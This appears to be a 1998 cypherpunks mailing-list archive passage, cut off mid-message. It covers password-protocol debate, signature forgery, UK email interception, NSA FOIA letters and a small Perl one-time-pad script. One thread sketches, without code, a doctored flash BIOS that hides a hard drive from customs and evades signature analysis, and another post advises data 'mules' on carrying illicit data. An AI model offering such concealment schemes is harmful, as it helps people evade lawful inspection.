> >I suppose you misunderstood me. I mean the 'mathematical magic'
> >cannot be made public. (Or is 'online protocol' = 'mathematical magic'?)
> >If the 'magic' is public then the attacker with the pool of passwords
> >could brute force offline.
> 
> No.  You misunderstood me.  There is NOTHING secret except the key.
> The online protocol, mathematical magic, source code, algorithm details,
> and everything else can be made public.  There are no secrets in the
> system except for the keys.

In that case please allow me to go back to a point raised by me
previously. The user uses his 'remembered secret' (of fewer bits) 
through a public algorithm (including protocol) to retrieve from a 
pool the password (of more bits). If the attacker doesn't have the 
pool then everything looks fine. But if he manages to get the pool
(a case someone mentioned in this thread) then he can obviously
brute force offline, I believe, since he possesses now everything
the legitimate user has, excepting the 'remembered secret'. Or is
there anything wrong with my logic?

M. K. Shen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben Laurie <ben@algroup.co.uk>
Date: Tue, 22 Sep 1998 09:24:22 +0800
To: Bruce Schneier <schneier@counterpane.com>
Subject: Re: ArcotSign (was Re: Does security depend on hardware?)
In-Reply-To: <Pine.LNX.3.96.980921133001.20069A-100000@blackbox>
Message-ID: <3607B318.BC911171@algroup.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



Bruce Schneier wrote:
> >(I suppose the 'remembered secret' has less bits then the 'password'
> >that is to be retrieved from the pool of millions with the
> >'mathematical magic'). So the advantages of the scheme appear to
> >remain unclear as a matter of principle.
> 
> The advantages are that offline password guessing is impossible.

The 'I' word always makes me nervous - do you really mean that, or do
you just mean "very difficult"?

Cheers,

Ben.

-- 
Ben Laurie            |Phone: +44 (181) 735 0686| Apache Group member
Freelance Consultant  |Fax:   +44 (181) 735 0689|http://www.apache.org/
and Technical Director|Email: ben@algroup.co.uk |
A.L. Digital Ltd,     |Apache-SSL author     http://www.apache-ssl.org/
London, England.      |"Apache: TDG" http://www.ora.com/catalog/apache/

WE'RE RECRUITING! http://www.aldigital.co.uk/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mok-Kong Shen <mok-kong.shen@stud.uni-muenchen.de>
Date: Tue, 22 Sep 1998 08:42:29 +0800
To: cypherpunks@toad.com
Subject: Re: Stego-empty hard drives... (fwd)
In-Reply-To: <199809220116.UAA20070@einstein.ssz.com>
Message-ID: <3607A71E.14DB9826@stud.uni-muenchen.de>
MIME-Version: 1.0
Content-Type: text/plain



Mark Hahn wrote:
> 
> 2) If you can't leave your floppy at home, carry your sensitive data on
> a PCMCIA Type-II Hard Drive. Kingston sells one sporting 500MB
> of capacity. Pop it out and put it as far away from the laptop as you
> can. Inside your other luggage somewhere.

I am ignorant about hardware. Question: Wouldn't it be possible to
somehow put information on a music CD?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Schneier <schneier@counterpane.com>
Date: Tue, 22 Sep 1998 16:43:28 +0800
To: proff@iq.org
Subject: Re: ArcotSign (was Re: Does security depend on hardware?)
In-Reply-To: <4.0.2.19980922114142.00956610@mail.visi.com>
Message-ID: <4.0.2.19980922155723.00956a50@mail.visi.com>
MIME-Version: 1.0
Content-Type: text/plain



At 03:40 AM 9/23/98 +1000, proff@iq.org wrote:
>> >the legitimate user has, excepting the 'remembered secret'. Or is
>> >there anything wrong with my logic?
>> 
>> Yes.  There is something wrong with you logic.
>> 
>> Bruce
>> **********************************************************************
>> Bruce Schneier, President, Counterpane Systems     Phone: 612-823-1098
>
>There's something wrong with you grammer.

Touche.

Bruce
**********************************************************************
Bruce Schneier, President, Counterpane Systems     Phone: 612-823-1098
101 E Minnehaha Parkway, Minneapolis, MN  55419      Fax: 612-823-1590
           Free crypto newsletter.  See:  http://www.counterpane.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Tue, 22 Sep 1998 09:59:01 +0800
To: cypherpunks@cyberpass.net
Subject: CHALLENGE response (fwd)
Message-ID: <199809221501.RAA05998@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



The whole point of the CHALLENGE response went straight over his head,
didn't it?  It's almost as though there are two mailing lists here: the
one for dolts, where Jim Choate gets into his idiotic little arguments
with his fellow fools, yammering back and forth on totally off-topic
matters, and the one for people interested in cryptography and its
implications.

We have here the first known case where a key was constructed ex post
facto to validate a signed message, in response to Adam Back's challenge.
No longer can you assume that just because you posted a signed message
on a certain date, and you hold the public key which signed that message,
that you can later prove authorship.  It challenges some of the implicit
assumptions which have been made in using public key cryptography.

And all Jim Choate can do is take issue with a snippet of Toto's ravings
which were included purely to illustrate the signature validity.  He is
completely unaware of what is really happening.

Jim Choate writes:

> Forwarded message:
> 
> > Date: Tue, 22 Sep 1998 08:01:07 +0200
> > From: Anonymous <nobody@replay.com>
> > Subject: CHALLENGE response
> 
> > "Contrary to one famous philosopher,
> > you're saying the medium is not the
> > message," Judge Thomas Nelson said,
> > alluding to the media theorist Marshall
> > McLuhan. 
> > http://www.nytimes.com/library/cyber/week/120997encrypt-bernstein.html
> > 
> >   Bullshit!
> >   The bits and bytes of email encryption are a clear message
> > that I wish to exercise my right to speak freely, without those
> > who wish to do me harm invading my privacy.
> 
> If you're going to take that tack then you need to invoke freedom of the
> press and not freedom of speech.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Hohensee <mah248@is9.nyu.edu>
Date: Tue, 22 Sep 1998 12:43:09 +0800
To: Jim Choate <cypherpunks@einstein.ssz.com
Subject: Re: Stego-empty hard drives... (fwd)
In-Reply-To: <199809220116.UAA20070@einstein.ssz.com>
Message-ID: <3607E291.4D7BFFBA@is9.nyu.edu>
MIME-Version: 1.0
Content-Type: text/plain



Jim Choate wrote:
> 
> Forwarded message:
> 
> > Date: Tue, 22 Sep 1998 00:46:03 +0000
> > From: Michael Hohensee <mah248@is9.nyu.edu>
> > Subject: Re: Stego-empty hard drives... (fwd)
> 
> > I believe that the idea was to set it up so that BIOS defaults to
> > HD-hiding mode.
> 
> How do you propose to do this? Via a BIOS setting?

Well, I don't propose to do it at all, since I lack the expertise to do
it or even know how much trouble it would be to do it. :)

I believe that the idea was to change BIOS itself.  That is, change the
BIOS program, rather than a setting.  This was to be done by
flash-updating the BIOS with a new program.

> > When you're taking your laptop through customs, you do
> > nothing while the machine boots up, the doctored BIOS does its thing,
> > and everybody's happy.  When you want to get at the stuff on the rest of
> > the HD, you reboot and type in your passphrase.
> 
> How do you propose to prompt the user for the correct time to type?

Perhaps the new BIOS program listens for something like Ctrl-Shift-P,
and if it gets it, goes into passphrase mode.  Otherwise, it does its
little trick.  As long as the doctored BIOS program produces a normal
looking bootup sequence (but hides the HD), everything's fine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brian B. Riley" <brianbr@together.net>
Date: Tue, 22 Sep 1998 17:03:24 +0800
To: "Jim Choate" <cypherpunks@einstein.ssz.com>
Subject: Re: Stego-empty hard drives... (fwd)
Message-ID: <199809222204.SAA28569@mx01.together.net>
MIME-Version: 1.0
Content-Type: text/plain



On 9/22/98 1:43 PM, Jim Choate (ravage@einstein.ssz.com)  passed this 
wisdom:

>Forwarded message:
>
>> Date: Tue, 22 Sep 1998 11:07:34 -0500
>> From: Petro <petro@playboy.com>
>> Subject: Re: Stego-empty hard drives... (fwd)
>
>> 	I don't know how hard this would be, but how about running a
>> seperate memory check, and while those numbers are flashing on the screen,
>> do the wait for imput?
>
>So hide the keyscan in the memory counter code. Would work externaly, would
>probably not show up on TEMPEST. Since both the keyscan and the memory scan
>are repetitive TEMPEST might have a problem telling them apart. Provided you
>could get the keyscan in the same footprint as the mem check the BIOS
>would not show up as anomolous in size. As long as they're not running
>around doing checksums you'd be ok (I suspect).

 Don't most memory scans do a keyscan anyway? looking for an ESC to 
bypass the scan? So have it also check for something else to bring up 
your special routine. It should pass all but the most detailed signature 
analysis.


Brian B. Riley --> http://members.macconnect.com/~brianbr
 For PGP Keys  <mailto:brianbr@together.net?subject=Get%20PGP%20Key>

 "Give a man a fish and you have fed him for a day, but give him a case
  of dynamite and soon the village will be showered with mud and
  seaweed and unidentifiable chunks of fish." -Joe Chew





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brian B. Riley" <brianbr@together.net>
Date: Tue, 22 Sep 1998 17:03:21 +0800
To: "Cypherpunks Distributed Remailer" <cypherpunks@einstein.ssz.com>
Subject: Re: Stego-empty hard drives... (fwd)
Message-ID: <199809222204.SAA28577@mx01.together.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

On 9/22/98 3:48 PM, Jim Choate (ravage@einstein.ssz.com)  passed this
wisdom:

>When you're at that level you don't carry the data across the line
>you get some Johnnie Mnemonic to do it for you or put it in a 
>diplomatic pouch...

I think the real answer here, and totally in keeping with the KISS
rule, has already been suggested. If you have sensitive data you keep
it on a PCMCIA hard drive card and remove it when not in use (or a
CD-R or a ZipDisk, though the PCMCIA hard drive does allow it to be a
'working' volume featuring speed and capacity that a Zip or a CD-R
cannot offer). It can work as easily for a desktop as for a laptop.
You can add to the security of this by using your platform of choice's
flavor of Secure Drive, Cryptdisk, PGPDisk, etc.

The ultimate stego is that the card is nowhere near the computer with
the main hard drive and they don't bother looking beyond when the
drive evaluation turns nothing up.

If its trafficking in illicit data the "mule' shouldn't even be
carrying a computer (or maybe only a Palm Pilot!) so the hounds have
even less reason to be looking for comp[uter stuff on him.

-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.0
Charset: noconv

iQEVAwUBNggY7j7r4fUXwraZAQG3swf8C3ypMG6EyI6t2I2LIpcwyV37Khv6Vm06
15HZ7rFOzrqwXG8RjDw4e99f5H76IG9FuDJUbUfJX0lS9aKtEaeeuSPUmtso8Au9
NrdTp3lHxMYJH9q+d8l1gVZWOnLQCjiJ7Ytd4LCmhmb3Ds58Sa41YoM71EFKZJkK
AIBC2pmkRT1ido4uvtLc9qjPDf/jtLHVH17tMdBKCvn6R8jbLq4QHk6T0J9rJt1O
+owC6R8YGpWjXPkIicsgfDD6qJiyyLLAMRX/1qWLVI+2CjeImhMsUGjafkq98x/B
UU6bGq8B5m2aJmpVMqGFceuJe4mUTtqxLfYF/MlwLokib7ap8+EEZw==
=A9fC
-----END PGP SIGNATURE-----


Brian B. Riley --> http://members.macconnect.com/~brianbr
  For PGP Keys  <mailto:brianbr@together.net?subject=Get%20PGP%20Key>

   "First say to your self what you would be; then do what you
    have to do."  Epictetus (35-135 A.D.)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Tue, 22 Sep 1998 19:20:32 +0800
To: ukcrypto@maillist.ox.ac.uk
Subject: public key problems
Message-ID: <36083BEF.2AF1@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain

Tuesday 9/22/98 5:59 PM

Smith http://www.softwar.net/softd.html

I am reading

http://www.softwar.net/mcc.html

I scanned-in the attached letter from McNamara.

Morales and I have been considering an appropriate response.

Public key has cost NSA and the gov BIG BUCKs.

Numerical analyst Richard Hanson worked in the same math group as
Simmons, Brickell and Norris.

http://www.vni.com/products/imsl/hanson.html          

Mike Norris, Hanson told me, designed the reciprocal approximation
used for division.

Hanson told me several days ago he knows what went wrong mathematically.

Hanson told me that he is even thinking of writing an article about
it.

I WAS TOLD what went wrong electronically.  By John Wisniewski.
And FUNCTIONALLY by Ron Kulju.

best 
bill


		NATIONAL SECURITY AGENCY
            FORT GEORGE G. MEADE, MARYLAND 20755-6000

					Serial:	J9343A-98
					19 August 1998


Mr. William H. Payne
13015 Calle de Sandias
Albuquerque, NM 87111

Dear Mr. Payne:

	This replies to your 15 May 1998 letter appealing the National Security Agency's (NSA) decision to 
deny your request for a fee waiver for your Freedom of Information Act request for invoices from various 
companies to NSA for payments for developing public key-related chips or Clipper chip-related hardware 
between January 1980 and February 1998. Your appeal was received in the Office of General
Counsel on 29 May 1998. I have reviewed your 27 February 1998 request, the Office of Policy's 30 March 
1998 response, and your appeal letter; and I have concluded that the fee waiver should not be granted.

	In reaching this decision, a number of factors were evaluated in light of the Act's purpose of  
promoting an informed citizenry.  The key issue I considered in my review is whether disclosure of the 
information is likely to contribute to the pubic understanding of the operations or activities of the government. 
See 5 U.S.C.  552 (a)(4XA)(iii). Implicit in this standard is a requirement to assess the nature of the 
information requested and whether it will likely be disseminated to the general public and will contribute to 
increased public understanding of the operations of the government. In order to support a fee waiver; the 
connection between furnishing the requested information and benefiting the public should be substantial.

	You have not indicated how you intend to disseminate any  information which might be released; we 
assume that you intend to place the material on the Internet. Making information available by posting it on the 
Internet so that a segment of interested persons might seek access to it does not meet the burden of 
demonstrating with particularity that the information will significantly contribute to the understanding of the 
public at large. You have not demonstrated that you have the skills and knowledge to be able to compile, 
analyze, and turn the materials into a distinct work understandable to the general public. Accordingly, 
I have determined that the public interest is better served in this instance by requiring, rather than waiving, the 
fee assessment.
	
	This response may be construed as a denial of your appeal. Accordingly, you are hereby advised of 
your right to seek judicial review of my decision pursuant to 5 U.S.C.  552(a)(4)B) in the United States 
District Court in the district in which you reside, in which you have your principal place of business, 
in which the Agency's records are situated (U.S. District Court of Maryland), or in the District of Columbia.

	As the Deputy Director of Policy explained to you, you have been placed in the"all other" category for 
fee purposes; this entitles you to 2 hours of search time and up to 100 pages free of charge. Your case file has 
been returned to the Office of Policy. Processing of your request has been suspended pending receipt of your
certified check or money order made payable to the Treasurer of United States in the amount of $750.00. If you 
have any questions or wish to narrow your request in order to reduce fees, please contact the Office of Policy 
between 0830 and 1600 EST on 301-688-6527. If we do not hear from you within 30 days, we will assume you 
are not interested in pursuing this request.

Sincerely,



BARBARA A. McNAMARA
Freedom of Information Act/Privacy Act
Appeals Authority



Friday February 27, 1998 3:15 PM


By e-mail and US mail

Lieutenant General Kenneth A Minihan, USAF

Director, National Security Agency
National Security Agency
9800 Savage Road
Fort George G. Meade, MD 20755-6000

Dear General Minihan:

Purposes of the letter are to

1  request information under the Freedom of Information Act
2  explore settlement possibilities of our current lawsuit.

In about 1986 Sandia National Laboratories assigned me the 
task of  design and construction of a Comprehensive Test Ban 
Treaty seismic data authenticator.

In the initial stages of the project, Sandia cryptographer 
Gustavus Simmons attempted to convince both Sandia 
management and NSA employees Tom White, Mark Unkenholtz,
and Ed Georgio that a form of public key authentication should 
replace NSA employee Ronald Benincasa's National Seismic
Station/Unmaned Seismic Observatory 11-bit data authentication
algorithm.

My Sandia supervisor John Holovka and project leader H B [Jim]
Durham ordered me to write a paper explaining public key 
cryptography.

This paper,  RSA ENCRYPTION, along with my SAND report
describing my implementation of Benincasa's algorithm and
filings in our lawsuit, now appear on Internet at
http://www.jya.com/index.htm, click CRYPTOME, then OpEd,
then http://www.jya.com/whprsa.htm.

Sandia explored the merits of switching from Benincasa's
algorithm to a public key-based authentication method suggested
by Simmons.

For Sandia's evaluation of the merits of public key, electronic tagging,
and Bureau of Engraving and Printing projects ,  I bought for Sandia 
samples both the Cylink CY1024 and AT&T A & B two chip sets for
modulo m arithmetic computations.

NSA employee Tom White sent me a copy of the SECRET classified
NSA report on IBM's hardware public key chip FIREFLY.

I wrote in my tutorial paper

  RSA hardware computations

  The slow speed of software RSA computations plus the potential
  wide use prompted several companies to build chips which compute
  modular arithmetic to at least several hundred bits.  Most of
  these chips "cascade" to compute with a larger number of bits.

  Corporations involved in building these chips are

     1  IBM  Firefly

     2  AT&T

     3  Motorola (apparently a three chip set)

     4  Cylink   Pittway-First alert

     5  Sandia Labs (Algorithm M and predecessor chip)

  Details of the IBM chip is classified.  AT&T as of July 1987 has
  not released details of their chip.  Little information is
  available on the Motorola chip set.

  The Cylink chip is commercially available.  Its price dropped
  from $1,500 to $600 each in June 1987.  Data is transferred to
  and from the chip with serial shift register communication.

  The early Sandia chip was limited in speed.  The replacement
  chip is cascadeable, communicates with 8 or 16 bits parallel,
  matches the speed of the Cylink chip, but is not out of
  fabrication.

  Rumors circulate that there is about an order of magnitude
  performance difference between some of these chips.

  These hardware chips improve exponentiation speed about 3 orders
  of magnitude over software implementation benchmarked on an Intel
  8086 family microcomputer.

Whitfield Diffie writes about both the Cylink and Sandia chips.  And
is quoted at  http://www.aci.net/kalliste/nukearse.htm.

Sandia had terrible luck with its public key chips.  

I reported SOME of the troubles to Electronic Engineering Times editor 
Loring Wirbel [http://techweb.cmp.com/eet/823/] on March 23, 1994.

        Dr. John Wisniewski was a supervisor at Sandia's Center for
        Radiation-hardened Microelectronics.  Wisniewski was a graduate
        student at Washington State University in about 1975.  I was a
        professor at WSU.

        Wisniewski knows all about the failing Sandia chips in the nuclear
        arsenal.  I took notes on February 13, 1993.  Wisniewski reviewed
        the problems again for me.

             1    No quality initiative.  Each chip lot had a different
                  process.
             2    Overall yield - 40-50%.  Down to 10% after packaging.
             3    Metalization problems.  No planarization.  No flow of
                  glass.  Couldn't use high temperature.  Step coverage
                  problems.  Layed down over tension.  100% field returns
                  over several years.
             4    Sandia would store lots of parts for replacements.

        Sandia management made the decision to place low yield parts in
        the nuclear arsenal.  Sandia must meet DOD schedules management
        reasoned.  Hundreds of millions spent on CRM.  Sandia must show
        productivity.

        Wisniewski told me that low yield chip test survivors are those   
        whichthe tests failed to detect failures.  Wisniewski will talk.  
        503-625-6408.  Wisniewski now works for Intel in Oregon.  Have 
        Wisniewski tell you about the fire in the CRM clean room!

Sandia supervisor Jerry Allen later told me it cost $300,000 each to remove
Sandia's failing chips at Pantex from a nuclear bomb.

NSA apparently is biased toward hardware implementations of cryptographic
and authentication algorithms.  As opposed to software implementation.

NSA representatives and Sandia management decided not to use a public
key authentication scheme for its CTBT seismic data authenticator because
of all of the problems with implementing public key algorithms.

But NSA surely has spent MUCH MONEY on public key chip implementations.

NSA is promoting its Clipper crypto chips as described at 
http://cpsr.org/dox/clipper.html.

And we get some information about technical specifications of NSA's Clipper
chip at http://www.us.net/softwar/http://www.us.net/softwar/clip.html

  Clipper Chip Information

  MYK-78 CLIPPER CHIP ENCRYPTION/DECRYPTION  ON A CHIP 

     1 micron double level metal CMOS technology 
     0.35 watts power 
     28 pin plastic leaded chip carrier (PLCC) package 
     Transistor to transistor logic (TTL) interface 
     Chip ID, family key and device unique key are installed at 
     programming. 
     Chip ID, family key and device unique key are installed at programming           
     facility and are completely transparent to the user.

Therefore, Under the provision of the Freedom of Information Act, 
5 USC 552, I am requesting access to: 

1  Copies of all invoices from

	A   AT&T
	B   Motorola
	C   IBM
	D  Sandia National Laboratories

to NSA for payments for developing ANY public key-related chips between 
January 1, 1980 and February 27, 1998.

2  Copies of all invoices to NSA from ANY corporation involved in 
development
of ANY Clipper chip-related hardware between January 1, 1980 and 
February 27, 1998.

The public has a right to know how much NSA spent on TRYING monoploize the 
crypto business.

If there are any fees for searching for, or copying, the records I have 
requested, please inform me before you fill the request.

As you know, the Act permits you to reduce or waive the fees when the 
release of the information is considered as "primarily benefiting the 
public."
  
I believe that this requests fits that category and I therefore ask that 
you waive any fees.

If all or any part of this request is denied, please cite the specific 
exemption(s) which you think justifies your refusal to release the information and inform me of your agency's administrative appeal procedures available to me under the law.

I would appreciate your handling this request as quickly as possible, and I 
look forward to hearing from you within 20 working days, as the law stipulates.

With respect to our current FOIA lawsuit, I feel that we should settle this
unfortunate matter.

I see from your biography at  http://www.nsa.gov:8080/ and
http://www.nsa.gov:8080/dirnsa/dirnsa.html that you are

         1979   Distinguished Graduate
         Master of Arts degree in National Security Affairs 
         Naval Postgraduate School 
         Monterey, California

One of my former M.S. and Ph.D students in Computer Science,
Ted Lewis, is currently the chairman of Computer Science at
Naval Postgraduate School [http://www.friction-free-economy.com/].

Small world.

But I think that this emphasizes that WE SHOULD all be on the same side.
Not engaged in a conflict in US federal court.  Or on Internet.

NSA attempts to withhold requested information are possibly unwise.  

In our wired world the aggrieved know what happened to them.
[http://www.aci.net/kalliste/speccoll.htm]. http://www.wpiran.org/,
http://www.netlink.co.uk/users/impact/namir/namirm.html

And moderates in Iran, [http://persia.org/khatami/biography.html], appear 
want settlement too.

My family and I have been damaged by these crypto wars.

I ask you that consider fair settlement of damages caused by the National
Security Agency.

I cannot find your e-mail address on Internet.

Therefore I will forward the e-mail copy of this FOIA/settlement letter to 
Ray Kammer of NIST [http://www.nist.gov/], who along with the FBI 
[http://www.fbi.gov/, http://www.fbi.gov/fo/nyfo/nytwa.htmand], and NSA 
are trying to control the crypto business so that Kammer can possibly
forward an e-mail copy of the FOIA/Settlement letter to you.

Sincerely,

bill

William Payne
13015 Calle de Sandias
Albuquerque, NM 87111
505-292-7037 [I am not reading e-mail]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Tue, 22 Sep 1998 17:43:03 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Stego-empty hard drives... (fwd)
Message-ID: <199809222308.SAA07042@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Subject: Re: Stego-empty hard drives... (fwd)
> Date: Tue, 22 Sep 1998 18:04:28 -0400
> From: "Brian B. Riley" <brianbr@together.net>

>  Don't most memory scans do a keyscan anyway? looking for an ESC to 
> bypass the scan?

Some do, some don't. A lot of new machines resolve those issues in the BIOS
with a setting that allows you to choose between a couple of options at
post.

> So have it also check for something else to bring up 
> your special routine. It should pass all but the most detailed signature 
> analysis.

Maybe, the fact that you've added an extra block of code in there to check
for the additional keystroke would cause the cycle length of that section of
ML to be slightly longer, probably no more than 30 - 40 clock cycles. If
you're looking at the EM radiation that lengthening could show up.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: User of DOOM <nobody@seclab.com>
Date: Tue, 22 Sep 1998 11:10:19 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Clinton's fake apologies (fwd)
Message-ID: <199809221610.SAA07027@rogue.seclab.com>
MIME-Version: 1.0
Content-Type: text/plain



Anonymous wrote:
> On 20 Sep 1998, [I] wrote: [about lieing]
> > I agree it's bad. I agree it undermines the justice system a little bit.
> > But, ... impeachment?
> 
> Yes.
> 
> We have some jokester sitting in Washington with full authority over our
> military forces. The people can't believe a word he says. Congress can't
> believe a word he says. He rules by executive order. He ignores the
> Constitution.
> 
> There is argument over whether he ordered military strikes to divert
> attention from his scandal and whether he sold the country out to the Red
> Chinese. Now people like myself are thinking - totally justified - that
> this guy will do absolutely anything to hold on to his presidency.
> 
> I don't feel particularly secure with some guy who I can't trust running
> the military and with his finger on the nuclear button. That itself is a
> violation of national security.

Understandable sentiments. The position I can't understand is Jim's,
of being totally outraged by the lieing under oath regardless of anything else.
[although I respect his right to that opinion].

Unfortunately, you now wear the mantle of wanting to put away
Bill "Al Capone" Klinton not for tax evasion, but for "fibbing".

-- an anonymous aol32 user.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Tue, 22 Sep 1998 18:26:38 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: respect due to anonymous (Re: CHALLENGE response (fwd)) (fwd)
Message-ID: <199809222352.SAA07394@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Tue, 22 Sep 1998 20:20:37 +0100
> From: Adam Back <aba@dcs.ex.ac.uk>
> Subject: respect due to anonymous (Re: CHALLENGE response (fwd))

> Munge signatures!?  He generated an RSA key pair to match the
> pre-published signature based on generating primes of special form
> and/or using multiple smaller primes to construct an n which he could
> perform discrete logs in (plus a dead beef attack), and all you can
> say is the above.  You should take you hat off to anonymous.

What he did is respectable. Is he the first? I doubt it.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Tue, 22 Sep 1998 21:02:11 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Police seek to intercept emails without warrant: UK
Message-ID: <199809230203.TAA21764@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: Police seek to intercept emails without warrant: UK
Date: Sun, 20 Sep 1998 11:13:14 -0500
To: believer@telepath.com

Source:  London Telegraph
http://www.telegraph.co.uk:80/et?ac=000150689433551&rtmo=wMontQMb&atmo=99999
999&P4_FOLLOW_ON=/98/9/20/nemai20.html&pg=/et/98/9/20/nemai20.html

UK News 
Electronic Telegraph 
Sunday 20 September 1998
Issue 1213

Police seek to intercept emails without warrant
By David Bamber 

THE police will be able to intercept private emails without obtaining
a warrant, under a new agreement being finalised with Internet
providers.

The Telegraph has discovered that the police are negotiating the right
to monitor electronic letters by examining information held on disks
at the offices of the computer companies providing the links.
Because the laws on interception were drafted before emails were
widely used, the police do not need to obtain individual warrants to
read the correspondence. Telephone tapping and the interception of
ordinary post require a warrant from the Home Secretary, Jack
Straw.

The police say they need access to emails sent by the country's
eight-million Internet users so that they can monitor criminal activity,
especially paedophile and pornography rings. Mr Straw is backing
the proposed agreement. The police want all Internet providers to
keep copies of emails for a week. But the far-reaching moves have
led to fears that the private correspondence of innocent people and
businesses will be routinely monitored.

Liz Parratt, of the civil liberties organisation, Liberty, said: "Allowing
the police to read emails without a warrant would be akin to allowing
them to steam open our letters as soon as we put them in the post
box. I'd be interested to hear if any Internet providers signed up to
this shabby deal."

The first of three forums between Internet providers and the
Association of Chief Police Officers will be held in Edinburgh on
Tuesday.

(c) Copyright Telegraph Group Limited 1998.
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------




**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mok-Kong Shen <mok-kong.shen@stud.uni-muenchen.de>
Date: Wed, 23 Sep 1998 01:23:05 +0800
To: Bruce Schneier <schneier@counterpane.com>
Subject: Re: ArcotSign (was Re: Does security depend on hardware?)
In-Reply-To: <Pine.LNX.3.96.980921133001.20069A-100000@blackbox>
Message-ID: <3607DA11.6250C39A@stud.uni-muenchen.de>
MIME-Version: 1.0
Content-Type: text/plain



Bruce Schneier wrote:
> 
> At 03:04 PM 9/22/98 +0100, Mok-Kong Shen wrote:
> >Bruce Schneier wrote:
> >>
> >> >I suppose you misunderstood me. I mean the 'mathematical magic'
> >> >cannot be made public. (Or is 'online protocol' = 'mathematical magic'?)
> >> >If the 'magic' is public then the attacker with the pool of passwords
> >> >could brute force offline.
> >>
> >> No.  You misunderstood me.  There is NOTHING secret except the key.
> >> The online protocol, mathematical magic, source code, algorithm details,
> >> and everything else can be made public.  There are no secrets in the
> >> system except for the keys.
> >
> >In that case please allow me to go back to a point raised by me
> >previously. The user uses his 'remembered secret' (of fewer bits)
> >through a public algorithm (including protocol) to retrieve from a
> >pool the password (of more bits). If the attacker doesn't have the
> >pool then everything looks fine. But if he manages to get the pool
> >(a case someone mentioned in this thread) then he can obviously
> >brute force offline, I believe, since he possesses now everything
> >the legitimate user has, excepting the 'remembered secret'. Or is
> >there anything wrong with my logic?
> 
> Yes.  There is something wrong with you logic.

Please kindly explain. I like very much to learn from my errors.
Thank you very much in advance.

M. K. Shen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@nowhere.to>
Date: Tue, 22 Sep 1998 05:42:57 +0800
To: cypherpunks@toad.com
Subject: one-time pad
Message-ID: <2deab6ac1f0adf822ecf2e799fd0ba71@anonymous>
MIME-Version: 1.0
Content-Type: text/plain



Where can I get the one-time pad in perl? The one I have I can't figure
out how to input data into it:

#!/bin/perl
vec($_,0,1);
open(P,shift);
read(P,$p,length),print $_^$p while<>

Can anyone help?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sunder <sunder@brainlink.com>
Date: Tue, 22 Sep 1998 18:47:48 +0800
To: Jim Choate <ravage@einstein.ssz.com>
Subject: Re: (99% noise) Stego-empty hard drives... (fwd)
In-Reply-To: <199809221948.OAA06096@einstein.ssz.com>
Message-ID: <3608369E.6018339C@brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain



Jim Choate wrote:

> Consider that at any given time there are only a few hundred BIOS'es, made
> from a few dozen base images, driving all the machines out there. The number
> of companies that develop their own BIOS in toto for in-house products is next
> to nil (I know of none). What they do is buy a license and then re-write the
> sections they need to.

See: http://www.ping.be/bios/ for bioses and flash upgrades.
 
> The TEMPEST signal will be effected by speed, I see no reason to suspect
> that it's going to be processor dependant. Since the code gets executed
> in the same sequence in these shared BIOS there is going to be a shared
> footprint, which may get squeezed because of increased clock speed. Measuring
> that footprint at ranges of inches is nowhere near as expensive as trying to
> catch a monitor image from a block away.
> 
> If you store those few thousand footprints and do a compare any bozo can
> in fact run the machine. Just sit and watch to see if the red light comes
> on and call your supervisor.

Come on guys, this is silly. Why the fuck would the UK tempest scan your 
notebooks?  Manufacturers produce new machines every month, each with modified
